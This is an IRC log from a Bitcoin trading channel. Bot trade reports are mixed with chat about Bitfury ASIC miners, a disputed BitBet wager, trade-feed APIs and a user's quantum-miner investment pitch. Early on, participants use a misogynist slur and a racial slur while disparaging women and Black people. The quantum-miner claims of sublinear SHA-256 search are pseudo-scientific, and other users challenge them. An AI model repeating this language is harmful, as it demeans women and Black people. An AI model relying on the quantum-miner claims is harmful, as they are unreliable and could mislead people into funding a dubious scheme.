0.024959 = 0.599 BTC [+] Aug 31 18:18:45 ok actually my comment was harsh Aug 31 18:18:58 The only thing to retain from this article: don’t talk at a tech conference if there is a woman nearby. Aug 31 18:19:01 Now, will this help women get into tech? Of course not, they will feel shunned. I’d like to have more women there, but batshit insane feminists will not allow it. Aug 31 18:23:56 [BTCTC] [BASIC-MINING] 1 @ 0.189 BTC [-] Aug 31 18:24:16 lol okay then Aug 31 18:24:36 the problem is not batshit insane feminists. the problem is there's a group of morons, adria richards being a fine example, sandra sharp being anothjer fine example Aug 31 18:24:57 well the problem is the people who listen, they're larger Aug 31 18:25:03 who KNOW they dion't belong there, and KNOW that actual competent women a) would make them look bad and b) aren't likely to bother arguing politics with them Aug 31 18:25:19 and so they make this desperate ploy essentially union-like in its nature Aug 31 18:25:34 to carve themselves a little territory that may be defended on any other grounds but intellectual ability and professional competence Aug 31 18:25:39 such as, cunt. that'd be good. Aug 31 18:26:20 the same shit is going on in the states with the race politics thing, there's some incompetent niggers whio would like to exclude competent black people from jobs Aug 31 18:26:38 like, you know, the low effort high pay ones such as state senator. Aug 31 18:26:51 [HAVELOCK] [SMG] 370 @ 0.0002261 = 0.0837 BTC [-] Aug 31 18:27:28 [HAVELOCK] [SMG] 398 @ 0.0002102 = 0.0837 BTC [-] Aug 31 18:27:32 [HAVELOCK] [SMG] 602 @ 0.00021002 = 0.1264 BTC [-] Aug 31 18:29:46 thats why a nigga like me always be on my grind, im just a squirrel in this world tryin to get a nut...ya feel me. Aug 31 18:30:30 looking for nuts? theres plenty on teh forums. Aug 31 18:30:32 i don't, i'm jus' guessin' Aug 31 18:35:20 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.000801 = 0.0801 BTC [-] Aug 31 18:39:46 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0008 = 0.04 BTC [-] Aug 31 18:39:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00075 BTC [-] Aug 31 18:39:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00074 BTC [-] Aug 31 18:39:49 [BTCTC] [TAT.VIRTUALMINE] 1826 @ 0.0007003 = 1.2787 BTC [-] Aug 31 18:40:12 [BTCTC] [LABCOIN] 20 @ 0.003771 = 0.0754 BTC [-] Aug 31 18:40:13 [BTCTC] [LABCOIN] 117 @ 0.003772 = 0.4413 BTC [+] Aug 31 18:40:14 [BTCTC] [LABCOIN] 100 @ 0.003773 = 0.3773 BTC [+] Aug 31 18:41:09 [BTCTC] [LABCOIN] 91 @ 0.003774 = 0.3434 BTC [+] Aug 31 18:42:46 [BTCTC] [ACTIVEMINING] 250 @ 0.004199 = 1.0498 BTC [-] Aug 31 18:43:39 [BTCTC] [ACTIVEMINING] 250 @ 0.0042 = 1.05 BTC [+] Aug 31 18:44:52 [BTCTC] [LABCOIN] 161 @ 0.003774 = 0.6076 BTC [+] Aug 31 18:45:51 [BTCTC] [LABCOIN] 83 @ 0.00378 = 0.3137 BTC [+] Aug 31 18:46:33 [BTCTC] [LABCOIN] 6 @ 0.003783 = 0.0227 BTC [+] Aug 31 18:46:42 [BTCTC] [BTC-GROWTH] 18 @ 0.09805 = 1.7649 BTC [-] Aug 31 18:47:15 [BTCTC] [BTC-GROWTH] 46 @ 0.09804 = 4.5098 BTC [-] Aug 31 18:47:31 [BTCTC] [BTC-GROWTH] 25 @ 0.09802 = 2.4505 BTC [-] Aug 31 18:47:48 [BTCTC] [BTC-GROWTH] 10 @ 0.09801 = 0.9801 BTC [-] Aug 31 18:48:05 [BTCTC] [BTC-GROWTH] 25 @ 0.09802 = 2.4505 BTC [+] Aug 31 18:50:57 [BTCTC] [NASTY-PT] 148 @ 0.002671 = 0.3953 BTC [+] Aug 31 18:51:38 [BTCTC] [NASTY-PT] 225 @ 0.002672 = 0.6012 BTC [+] Aug 31 18:52:19 [BTCTC] [NASTY-PT] 20 @ 0.002674 = 0.0535 BTC [+] Aug 31 18:55:42 corporate espionage! http://www.theverge.com/2013/8/31/4679260/htc-top-designers-reportedly-in-custody-after-stealing-trade-secrets Aug 31 18:57:16 [BTCTC] [NASTY-PT] 20 @ 0.00275 = 0.055 BTC [+] Aug 31 18:57:31 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1986 = 0.7944 BTC [-] Aug 31 18:58:34 [BTCTC] [NASTY-PT] 5 @ 0.00285 = 0.0143 BTC [+] Aug 31 19:00:26 [BTCTC] [NASTY-PT] 5 @ 0.002999 = 0.015 BTC [+] Aug 31 19:00:27 [BTCTC] [NASTY-PT] 1 @ 0.002999 BTC [+] Aug 31 19:01:28 [BTCTC] [COGNITIVE] 1 @ 0.2885 BTC [+] Aug 31 19:02:12 [BTCTC] [DMS.MINING] 1 @ 0.003374 BTC [+] Aug 31 19:03:01 [BTCTC] [NASTY-PT] 5 @ 0.003 = 0.015 BTC [+] Aug 31 19:03:17 [BTCTC] [DMS.MINING] 2 @ 0.003374 = 0.0067 BTC [+] Aug 31 19:03:46 heh Aug 31 19:04:04 [MPEX] [S.MPOE] 365 @ 0.00086953 = 0.3174 BTC [-] Aug 31 19:04:10 [MPEX] [S.MPOE] 2300 @ 0.00086838 = 1.9973 BTC [-] Aug 31 19:05:13 [BTCTC] [NASTY-PT] 1 @ 0.003199 BTC [+] Aug 31 19:05:56 [BTCTC] [NASTY-PT] 10 @ 0.0032 = 0.032 BTC [+] Aug 31 19:07:20 [BTCTC] [NASTY-PT] 100 @ 0.00324 = 0.324 BTC [+] Aug 31 19:09:11 [BTCTC] [NASTY-PT] 138 @ 0.00325 = 0.4485 BTC [+] Aug 31 19:10:40 [BTCTC] [KENILWORTH] 473 @ 0.001778 = 0.841 BTC [+] Aug 31 19:10:42 [BTCTC] [KENILWORTH] 10 @ 0.001779 = 0.0178 BTC [+] Aug 31 19:10:43 [BTCTC] [KENILWORTH] 1000 @ 0.001791 = 1.791 BTC [+] Aug 31 19:10:44 [BTCTC] [KENILWORTH] 1011 @ 0.001795 = 1.8147 BTC [+] Aug 31 19:10:45 [BTCTC] [KENILWORTH] 60 @ 0.001797 = 0.1078 BTC [+] Aug 31 19:10:46 [BTCTC] [KENILWORTH] 446 @ 0.001799 = 0.8024 BTC [+] Aug 31 19:11:19 ;;ticker Aug 31 19:11:20 MtGox BTCUSD ticker | Best bid: 144.22001, Best ask: 144.99995, Bid-ask spread: 0.77994, Last trade: 144.21010, 24 hour volume: 29882.59233501, 24 hour low: 134.36270, 24 hour high: 146.01616, 24 hour vwap: 139.63425 Aug 31 19:21:00 [BTCTC] [COGNITIVE] 5 @ 0.2978 = 1.489 BTC [+] Aug 31 19:21:54 [BTCTC] [BITVPS] 2 @ 0.00262 = 0.0052 BTC [-] Aug 31 19:25:11 [BTCTC] [BASIC-MINING] 1 @ 0.189 BTC [-] Aug 31 19:26:12 [MPEX] [S.MPOE] 5800 @ 0.00086744 = 5.0312 BTC [-] Aug 31 19:27:40 [BTCTC] [LABCOIN] 99 @ 0.003781 = 0.3743 BTC [-] Aug 31 19:35:58 [HAVELOCK] [AM1] 1 @ 2.5 BTC [+] Aug 31 19:36:31 [BTCTC] [LABCOIN] 103 @ 0.003781 = 0.3894 BTC [-] Aug 31 19:38:44 $avg Aug 31 19:38:45 FabianB: 132.94 Aug 31 19:39:28 [BTCTC] [ACTIVEMINING] 66 @ 0.004199 = 0.2771 BTC [-] Aug 31 19:39:30 [BTCTC] [LABCOIN] 24 @ 0.003783 = 0.0908 BTC [+] Aug 31 19:39:31 [BTCTC] [LABCOIN] 100 @ 0.003783 = 0.3783 BTC [+] Aug 31 19:40:46 [MPEX] [S.MPOE] 35 @ 0.00086766 = 0.0304 BTC [+] Aug 31 19:40:48 [MPEX] [S.MPOE] 9979 @ 0.00087132 = 8.6949 BTC [+] Aug 31 19:42:36 [BTCTC] [LABCOIN] 100 @ 0.003798 = 0.3798 BTC [+] Aug 31 19:45:19 [BTCTC] [ASICMINER-PT] 1 @ 2.525 BTC [-] Aug 31 19:46:25 [BTCTC] [CB.IDIFF-O] 50 @ 0.009899 = 0.495 BTC [+] Aug 31 19:50:48 [BTCTC] [DMS.MINING] 1 @ 0.003374 BTC [+] Aug 31 19:51:42 [BTCTC] [LABCOIN] 20 @ 0.003798 = 0.076 BTC [+] Aug 31 20:00:27 [BTCTC] [LABCOIN] 568 @ 0.003696 = 2.0993 BTC [-] Aug 31 20:00:29 [BTCTC] [LABCOIN] 694 @ 0.003694 = 2.5636 BTC [-] Aug 31 20:05:28 any news on this bet? http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 31 20:05:44 [BTCTC] [LABCOIN] 12 @ 0.003796 = 0.0456 BTC [+] Aug 31 20:06:01 is the resolution exactly 7 hours away? Aug 31 20:11:35 it's not gonna happen until after that cuttof. Aug 31 20:14:48 [BTCTC] [LABCOIN] 19 @ 0.003796 = 0.0721 BTC [+] Aug 31 20:15:15 ok thanks. how long does the usual process take? Aug 31 20:15:22 [BTCTC] [LABCOIN] 27 @ 0.003796 = 0.1025 BTC [+] Aug 31 20:15:23 [BTCTC] [LABCOIN] 80 @ 0.003798 = 0.3038 BTC [+] Aug 31 20:15:24 [BTCTC] [LABCOIN] 100 @ 0.003798 = 0.3798 BTC [+] Aug 31 20:15:24 [BTCTC] [LABCOIN] 53 @ 0.003799 = 0.2013 BTC [+] Aug 31 20:16:26 i don't know it's ever been more than a day or two Aug 31 20:16:26 [BTCTC] [TAT.ASICMINER] 9 @ 0.02459 = 0.2213 BTC [-] Aug 31 20:16:52 punin: "We also found a noticeable voltage drop on the IOVDD chain when all 16 cards are plugged in (down to 1V66 from 1V8). This will get fixed (hopefully) in next revision on M-boards, that is already in production. This should help lower the errors and noise on Bus D." looks like their 400Gh units are underperforming on hashrate... Aug 31 20:17:34 ok... so if people post to the forums who receive orders tomorrow, those wouldn't be included in the bet timeframe, right? Aug 31 20:19:39 right. Aug 31 20:20:12 ok... and in which timezone is the cutoff? Aug 31 20:20:18 ;) Aug 31 20:20:26 what;'s the bet say anyway, by sept 1st ? on sept 1st ? Aug 31 20:20:43 before 1st. so midnight gmt Aug 31 20:20:47 sept 1 happens 24 times in different timezones Aug 31 20:20:53 gmt ok thanks Aug 31 20:21:03 http://bitbet.us/faq/#17 Aug 31 20:21:08 FAQ BitBet Aug 31 20:21:22 ah didnt see that. ok. thanks Aug 31 20:24:03 3600 coins released a day, current hash rate is 700TH, that means 1TH of mining power should generate me 3600/700= ~ 5 coins a day? Aug 31 20:25:24 more like 4100 released per day at this rate Aug 31 20:25:26 but anyway Aug 31 20:25:33 all variables are changing Aug 31 20:25:49 sure, cool Aug 31 20:26:27 B0g4r7 B0g4r7_ beetlebee BigBitz BitOTTer560 bloctoc bobbabad Bunnyh Aug 31 20:26:29 bobbabad : Aug 31 20:26:30 ;;genrate 1000000 Aug 31 20:26:31 The expected generation output, at 1000000.0 Mhps, given difficulty of 65750060.1491, is 7.64876131353 BTC per day and 0.318698388064 BTC per hour. Aug 31 20:26:33 ;;genrate 1000000 Aug 31 20:26:34 The expected generation output, at 1000000.0 Mhps, given difficulty of 65750060.1491, is 7.64876131353 BTC per day and 0.318698388064 BTC per hour. Aug 31 20:26:36 doh Aug 31 20:26:42 ^5 Aug 31 20:27:05 cool, thanks Aug 31 20:28:05 whether 1th is 1000000 mhps or 1024**2 mhps is a discussion best left for another day :D Aug 31 20:29:36 anyone know the details about bitfurys mining pool? https://ghash.io/ they have gone from nothing to supposedly 125TH is very short time Aug 31 20:29:52 *in Aug 31 20:30:52 http://blockchain.info/pools doesn't seem to know them Aug 31 20:30:55 Bitcoin Hashrate Distribution - Blockchain.info Aug 31 20:34:00 the blue "unkown" slice matches fairly close to their share of ~18% Aug 31 20:36:21 that's what happens when actual chips get delivered. Aug 31 20:37:00 you know, as opposed to labcoin, picostocks and all the rest of the scams. Aug 31 20:37:26 actually, I think that is picostocks 100TH mine Aug 31 20:39:05 yea, but that's because your brain don't work so well. Aug 31 20:40:18 haha Aug 31 20:44:09 seems to just be a private pool of bitfury gear owners Aug 31 20:44:41 ... /apparently/ ... Aug 31 20:44:47 har har. Aug 31 20:46:14 please DO NOT look at blockchain.info for pool stats Aug 31 20:46:19 they suck really badly Aug 31 20:46:30 where is better? Aug 31 20:46:48 http://blockorigin.pfoe.be/top.php makes an effort to be accurate Aug 31 20:47:09 there is even a posat in the mining subforum pointing out they suck Aug 31 20:47:12 nice Aug 31 20:47:14 post* Aug 31 20:47:43 Graet does am mine all on their private pool or do they still distribute ? Aug 31 20:47:56 all on their own Aug 31 20:49:00 did I read somwhere AM is hoping to have 1000TH online by end of year? Aug 31 20:49:00 7%, not doing so hot. Aug 31 20:56:00 For those following conversation re the quantum miner I've been espousing and raising capita for, here is the latest indepedent assesment. From lead at the Quantum Information Science Group, MITRE Corp: "I follow the logic of your claim but am not familiar enough with the papers you reference to properly say whether or not I agree. However, I do understand your interest in applying QEC Aug 31 20:56:00 [quantum error correction] only once and I think that my work has something to contribute in that respect." Aug 31 21:03:19 dear jorash, why sha256 can't be just computed directly? i just don't get this quantum emulation detour Aug 31 21:04:34 like if you wanted to execute lisp by emulating whole lisp machine Aug 31 21:04:54 but exponentially worse Aug 31 21:07:05 and that is besides how the science works that you'd first prove that P=BQP and *then* set on to build btc miner special case Aug 31 21:07:07 not the other way around Aug 31 21:07:43 The only hard proof is implemented software Aug 31 21:07:59 lmao Aug 31 21:08:04 There are a number of P = NP proofs, none widely accepted. The math must perform Aug 31 21:08:06 you know how maffs wokr? Aug 31 21:08:39 oh, such as? Aug 31 21:08:43 The particularity of this claim is that classical computers can efficiently simulate arbitrary quantum systems. If that's the proof, then execute on it. That is the academic mind set and I agree Aug 31 21:09:01 http://arxiv.org/abs/1205.6658 Aug 31 21:09:05 [1205.6658] From classical versus quantum algorithms to P versus NP Aug 31 21:09:53 sha256 is 'computeed directly', and that is why it's currently only broken in linear time (ie. isn't broken at all, just brute forced quickly) Aug 31 21:10:29 quantum simulation (in P) is the only means of getting sublinear search times Aug 31 21:10:46 only obvious method at least Aug 31 21:11:22 The proof of concept is Gottesman Knill circuits (Clifford + Stabilizer) which are highly entangled, yet run in classical P time (actually Parity L class) Aug 31 21:12:33 These circuits have been implemented https://github.com/marcusps/GraphSim But they are sub-universal. In order to make them universal you need a 'non-Clifford' gate to add to the Gottesman-Knill circuit. Which normally incurs expoenntial slow down in your classical simulation cost. However this cost can be avoided if you apply enough noise to make the circuit efficent, and only apply Aug 31 21:12:33 quantum EC once at the end of computation (instead of throughout) -- which is what the quoted researcher is saying is probably well suited Aug 31 21:14:28 jorash!*@* added to ignore list. Aug 31 21:15:37 i'm not familiar with this area, but you still did not say why you have to prove it using sha256(sha256()) Aug 31 21:15:44 and not anything simpler at first Aug 31 21:16:19 jorash is a l33t pwny. listen to his wis3 w0rds Aug 31 21:17:10 fractal you getting the same 10cent word impression i do ? Aug 31 21:17:39 and why it does have such a budget? just get some bright phd to do it Aug 31 21:17:48 jborkl Jezzz JimmyHo3 joesmoe joeykrim johnnyfootball jorash jordandotdev jurov Aug 31 21:17:57 lol jurov being the master of outsurcing hard labour >D Aug 31 21:18:26 the NSA spends $11B a year on cryptanalysis... they likely have some quantum computers Aug 31 21:19:09 but you assert all the pieces are there Aug 31 21:21:17 oh Vit does maffs? Aug 31 21:22:34 so you do have the emulator already? Aug 31 21:29:11 hm, so based on the P=NP paper you gave me you basically say it's possible to extend things like primality test Aug 31 21:29:22 to any computational problem? Aug 31 21:31:45 well, that's beyond my grasp again Aug 31 21:32:28 you should try to explain it without throwing so many tech terms, sorry Aug 31 21:32:56 Later, in 1977, Robert Solovay and Volker Strassen [6] found that the problem of integer primality, at this time out of reach of tractable deterministic algorithms, was settled by randomization. It should be noticed that the deep reason of this improbable efficiency remained basically unknown. Aug 31 21:33:17 ^ I had this at uni and was amazed how easy is to prove something is a prime Aug 31 21:33:35 so you should explain it at least on this level Aug 31 21:35:42 that thesis doen't say anything about polynomial computability Aug 31 21:37:51 does anyone know of a way to get live trade feeds for bitfunder? Aug 31 21:38:25 seangeng: there's not yet released api.. so it's possible only at #bitfunder atm Aug 31 21:38:56 hmmm, thanks Aug 31 21:45:16 seangeng: you can use coinflow's api: http://coinflow.co/json/BF/G.ASICMINER-PT which uses the irc bot as data input afaik Aug 31 21:45:55 http://youtu.be/j2mdYX1nF_Y Aug 31 21:45:57 Milton Friedman, Land value tax and internet currencies - YouTube Aug 31 21:46:54 I'm attempting to retrieve the live trades occuring to display as a feed on my site: http://kryptotrader.com Aug 31 21:46:55 land value tax has many issues though Aug 31 21:47:21 the coinflow api just displays trade data for individual securities Aug 31 21:47:27 but i'm looking for the whole market Aug 31 21:47:47 bitfunder has no API at all?! Aug 31 21:48:01 pankkake, it will be public in 2 weeks Aug 31 21:48:06 so they say Aug 31 21:48:10 ah Aug 31 21:48:13 but it's been in development for a while Aug 31 21:48:15 BFL 2 weeks or seriously? Aug 31 21:48:23 so far it was bfl 2 weeks Aug 31 21:48:28 yep... Aug 31 21:48:59 i can set up a script to capture the output of assetbot on #bitfunder Aug 31 21:49:11 ..when the bot is online Aug 31 21:49:16 but I'm on the channel over there now and it hasnt been outputing anything Aug 31 21:49:18 yep... Aug 31 21:49:23 well I am involved into a library that makes APIs out of websites that do not have APIs (among other features, it also unifies APIs). it's actually interesting for me if I can provide more value than I thought Aug 31 21:49:47 really? that's actually awesome Aug 31 21:50:04 yeah it is. mostly centered around French websites for now Aug 31 21:50:07 there *is* some alpha socket interface for updating the market data in realtime Aug 31 21:50:22 but it's not clear whether you can hook all assets at once Aug 31 21:50:38 coinflow seems to achieve it in their live trade output Aug 31 21:50:44 but i have no idea how they are doing it Aug 31 21:51:21 isn't it taking the data from assbot? Aug 31 21:51:40 on here? Aug 31 21:51:52 this assbot doesnt output bitfunder data Aug 31 21:57:38 oh. maybe he does the same thing, watching #bitfunder? Aug 31 21:57:50 seangeng_: i assume he uses #bitfunder. there is also http://coinflow.co/livetrades/ ... i think there is a json output somewhere, though i don't know where and if at all. maybe you are able to use the datastream used in /livetrades/ directly Aug 31 22:02:35 yeah prolly pankkake Aug 31 22:03:28 [HAVELOCK] [SMG] 4 @ 0.000238 = 0.001 BTC [+] Aug 31 22:04:00 looks like #bitfunder 's assetbot is outputing data now Aug 31 22:04:09 i'll see if i can write something that captures it's output Aug 31 22:04:38 why are you doing the same thing again when its stupid way to do it for the first time around Aug 31 22:04:51 ah well Aug 31 22:04:56 because there's no better way? :) Aug 31 22:05:16 i has socket Aug 31 22:05:21 use the websocket maybe? Aug 31 22:07:14 websocket from where? Aug 31 22:08:18 from the site? Aug 31 22:08:34 all but bf Aug 31 22:08:36 coinflow or bf? Aug 31 22:09:04 bf Aug 31 22:09:46 didn't know they provide one Aug 31 22:10:22 that's how the site works.. Aug 31 22:10:27 ooo Aug 31 22:10:28 i messaged ukyo to ask him Aug 31 22:10:32 mircea_popescu: https://bitcointalk.org/index.php?topic=250249.msg3051503#msg3051503 Aug 31 22:10:51 can i has summary ? Aug 31 22:11:06 check the link Aug 31 22:11:11 a delivered 400gh unit Aug 31 22:11:33 ahaha working better without fans! Aug 31 22:11:34 golden Aug 31 22:11:42 hey, buttcoin ppl : pls to include in your next update ty. Aug 31 22:12:05 Anduck it does 499 gh actually ? Aug 31 22:12:29 400gh and 25gh unit together does that i think Aug 31 22:12:58 and that in total draws less than 400 watts Aug 31 22:13:08 I'm still tweaking my units manually. I'd say 380GH from 16 H-boards is possible. Aug 31 22:13:08 [BTCTC] [LABCOIN] 20 @ 0.003701 = 0.074 BTC [+] Aug 31 22:13:09 aj Aug 31 22:13:09 [BTCTC] [LABCOIN] 200 @ 0.0037 = 0.74 BTC [-] Aug 31 22:13:33 yeah Aug 31 22:13:39 what about that? Aug 31 22:13:49 [BTCTC] [LABCOIN] 238 @ 0.003698 = 0.8801 BTC [-] Aug 31 22:13:50 [BTCTC] [LABCOIN] 306 @ 0.003694 = 1.1304 BTC [-] Aug 31 22:13:52 [BTCTC] [LABCOIN] 100 @ 0.003692 = 0.3692 BTC [-] Aug 31 22:13:53 [BTCTC] [LABCOIN] 800 @ 0.003691 = 2.9528 BTC [-] Aug 31 22:13:54 [BTCTC] [LABCOIN] 100 @ 0.00369 = 0.369 BTC [-] Aug 31 22:13:54 [BTCTC] [LABCOIN] 50 @ 0.003689 = 0.1845 BTC [-] Aug 31 22:13:55 [BTCTC] [LABCOIN] 500 @ 0.003688 = 1.844 BTC [-] Aug 31 22:13:57 [BTCTC] [LABCOIN] 567 @ 0.003688 = 2.0911 BTC [-] Aug 31 22:14:11 https://bitcointalk.org/index.php?topic=250249.msg3050985#msg3050985 Aug 31 22:14:14 that shit's golden. Aug 31 22:14:16 [ANN] Bitfury ASIC sales in EU and Europe Aug 31 22:14:22 yup Aug 31 22:15:09 but i must again say: he ordered 400gh unit and 25gh unit and got both, both performing as advertised (except he got extra hardware for that) Aug 31 22:15:27 so, that basically proves that the 400GH unit missed specs. Aug 31 22:15:30 - 365GH vs. 60GH. Aug 31 22:15:30 just trying to push the bet wording once again so there's _no_ misunderstanding Aug 31 22:15:46 400Gh unit did not perform as advertised Aug 31 22:15:55 that's not the full 400 gh unit in the pic, it's a full m-board with 16 h-cards. Aug 31 22:15:56 lol Aug 31 22:16:13 which is what was advertised as a '400Gh' unit, according to the website Aug 31 22:16:18 the 400gh unit he bought is splitted in 2 m-boards, 20 h-cards Aug 31 22:16:22 nope Aug 31 22:16:26 yeah they didn't meet hardware specs, true Aug 31 22:16:41 but the bet was about the delivered unit. think about BFL Aug 31 22:16:46 they didn't meet hardware specs because the hardware underperformed -- and that is what the bet is about. Aug 31 22:17:10 lol hello you two. Aug 31 22:17:25 BFL says they will deliver a 5gh hashing unit which eats X amount of watts. they deliver a bigger sized 5gh hashing unit that eats X amount of watts. customer got the advertised performance Aug 31 22:17:58 but if BFL says they deliver 5gh hashing unit that eats X amount of watts and delivers same sized unit that eats X+10 watts, they haven't met the advertised performance Aug 31 22:18:08 BFL was just used here as an example of an asic supplier Aug 31 22:18:12 http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ -- 400Gh unit -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- the hardware did not perform as advertised. Aug 31 22:18:34 it was about the W/GH as the brackets say Aug 31 22:18:35 :I Aug 31 22:18:42 http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ -- 400Gh unit -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- the hardware did not perform as advertised. The bet clearly states that the hardware must perform as advertised. All conditions of the bet were not met. Therefore the bet is a NO. Aug 31 22:18:46 not about amount of hardware needed for the unit. it as about the _performance_ Aug 31 22:18:53 Thats not what the bet says Aug 31 22:19:00 and the only thing that matters is what the bet says Aug 31 22:19:30 bitbet.us has to go by the WORDing of the BET. not by what else 'it could mean' Aug 31 22:19:35 the bet says people who order 400 gh will get 400 gh and it will perform as promised!!!! Aug 31 22:19:43 no, it doesn't Aug 31 22:19:52 but that's what the bet says? Aug 31 22:19:55 [BTCTC] [PETA-MINE] 10 @ 0.6498 = 6.498 BTC [+] Aug 31 22:20:23 they failed to meet the LOOK and AMOUNT of hardware but NOT the PERFORMANCE Aug 31 22:20:28 and the bet was about PERFORMANCE Aug 31 22:20:36 and it failed on performance. Aug 31 22:20:50 how the fuck it failed on performance if it eats less than 1 W/GH as promised??? Aug 31 22:20:51 -- 400Gh unit -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- the hardware did not perform as advertised. Aug 31 22:21:06 yeah that's where they describe the hardware the unit includes Aug 31 22:21:15 and they failed that part since they had to add more hardware for the unit Aug 31 22:21:23 but they STILL did NOT fail the PERFORMANCE Aug 31 22:21:31 [BTCTC] [DMS.PURCHASE] 3 @ 0.01588 = 0.0476 BTC [-] Aug 31 22:21:32 There are 2 performance metrics -- hashrate, and wattage-- to meet performance the hashrate must be higher then advertised, and the wattage must be lower. The hashrate missed targets. Aug 31 22:21:42 Anduck: sorry, but thats not what the bet says. Aug 31 22:21:49 but people got the hashrate they ordered? Aug 31 22:21:54 how did they miss that target? Aug 31 22:21:56 Anduck: thats not what the bet says. Aug 31 22:22:30 but it says that the people must get the hashrate they ordered. and it must eat the <1 w/GH power. and that promise is kept. Aug 31 22:22:36 there's nothing unclear in this Aug 31 22:22:44 Anduck: no, the bet doesn't say that. Aug 31 22:23:07 i don't understand why you all the time come up with that they had to add more h-cards for the unit.. :/ they failed that but it's got nothing to do with the performance of the unit! Aug 31 22:23:41 the brackets in the bet describe what the "advertised performance" means Aug 31 22:23:43 Anduck: the 400Gh unit --as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- failed to meet hashrate performance targets. Aug 31 22:23:58 it says 'As advertised' Aug 31 22:24:09 ._. there's no point in this since even now you understand you're wrong - you still keep on pushing that Aug 31 22:24:45 they promised that when one buys 400gh unit, they get 400 gigahash of hashing power and it eats less than 400 watts of power. Aug 31 22:24:47 Again, I'm only going by what the bet actually says -- Thats why I bet NO. because I didn't think their 400Gh unit as advertised would meet targets -- and they'd have to refund (or ship more hardware) to make up for their mistakes and underperformance. Aug 31 22:25:02 Anduck: thats irrelevant to what the bet says. Aug 31 22:25:10 Again, i'm only going by what the bet says Aug 31 22:25:22 the 400Gh UNIT only does 360Gh Aug 31 22:25:58 you must understand here that unit, when talking about 25gh unit or 400 gh unit is built from m-boards and h-boards Aug 31 22:26:12 I understand very well Aug 31 22:26:22 what do you think 25gh unit is? Aug 31 22:26:22 the 400Gh unit --as advertised -- is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- Aug 31 22:26:33 stop pasting that lol Aug 31 22:26:38 here we go again.. Aug 31 22:26:42 you can refer to it without pasting it all the time :D Aug 31 22:26:46 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [-] Aug 31 22:27:03 >> #annoyingbetdiscussions :p Aug 31 22:27:15 A 25 gh unit was advertised as a single H-card. -- I'm pasting it all the time because you don't seem to realize that the bet says hardware device/uni AS ADVERTISED' -- i'm only going by the bet language Aug 31 22:27:49 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Aug 31 22:28:12 [BTCTC] [ASICMINER-PT] 1 @ 2.482 BTC [-] Aug 31 22:28:19 yeah 25gh unit was advertised as a single h-card. but it took 2 h-cards to make the unit., Aug 31 22:28:21 understand? Aug 31 22:28:31 they failed _hardware amount promise_ Aug 31 22:28:52 the 25gh unit still _performs_ (promised hashrate at promised watts usage) as promised Aug 31 22:29:00 understand???? Aug 31 22:29:42 I bet ~0.10 BTC on this. If I give it to you both, will you shut up? :) Aug 31 22:29:46 No, thats not what the bet says.... Maybe you can strech the argument for the 25Gh card by saying its modular (even though i disagree because AS ADVERTISED it was 1 card), but you certianly can't for the 400Gh unit Aug 31 22:29:58 ^what pankkake says Aug 31 22:30:03 :p Aug 31 22:30:49 anyway, it likely won't change the mind of whoever decides the outcome of the bet Aug 31 22:31:06 yup Aug 31 22:31:47 yup Aug 31 22:32:58 1 day right and you know what its going to be? Aug 31 22:33:20 I can only hope that most rational people will look at the bet langugage, and then look and see that the 400Gh unit --as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- missed performance targets, and that the not all conditions of the bet were met. Aug 31 22:34:06 btw fractal Aug 31 22:36:38 bets can be voided, too… Aug 31 22:37:28 If the bet was voided, I would not mind as I do feel badly for Anduck -- he wrote the bet wrongly to what he meant. I have a conscience. Aug 31 22:37:54 But, according to the language, the bet is a NO. That doesn't change the fact that I think Bitfury is awesome and did a great job. Aug 31 22:39:17 it suppose it could be argued the language made the bet a 'Bad bet' according to the FAQ... Aug 31 22:39:48 this was obviously an unexpected outcome and not covered in the bet language.. Aug 31 22:40:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02435 = 0.0974 BTC [+] Aug 31 22:40:59 well Aug 31 22:42:23 as unit i meant the 400 gh package of mining gear Aug 31 22:42:54 the bfsb.com shop says that 400 gh unit is 16-h boards in 1 m-board Aug 31 22:43:06 Yea, but you didn't explicitly state that -- and people reading the bet went on the bitfurystrikesback website, and saw that a UNIT was "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- what do you say to those people??? Aug 31 22:43:18 but people got 18-20 h-boards + 2 m-boards as the 400gh unit Aug 31 22:43:29 where is this bet actually? Aug 31 22:43:35 Thats not what was advertised, and contrary to the bet langugae Aug 31 22:44:01 the bet was about advertised performance Aug 31 22:44:03 at bfsb it says: Aug 31 22:44:04 Performance: Aug 31 22:44:04 400GHash/s Aug 31 22:44:04 Total power draw max. 400W (Efficiency at wall depends on your PSU) Aug 31 22:44:09 and that promise is met Aug 31 22:44:19 where is the bet located? Aug 31 22:44:23 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 31 22:44:28 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 31 22:44:42 weird search didn't have anything on bitfury.. Aug 31 22:44:56 thats not what the bet says -- it says 400Gh UNIT must be 400Gh, a unit is as advertised - '"1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 22:45:05 there's no such thing as 400 gh device Aug 31 22:45:08 since it's all modular Aug 31 22:45:09 ... Aug 31 22:45:11 infinite loop Aug 31 22:45:17 Not true Aug 31 22:45:21 but it is true Aug 31 22:45:29 As per the website - a 400Gh unit is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 22:45:30 there's no such thing as 25 gh device since it's all modular Aug 31 22:45:37 no Aug 31 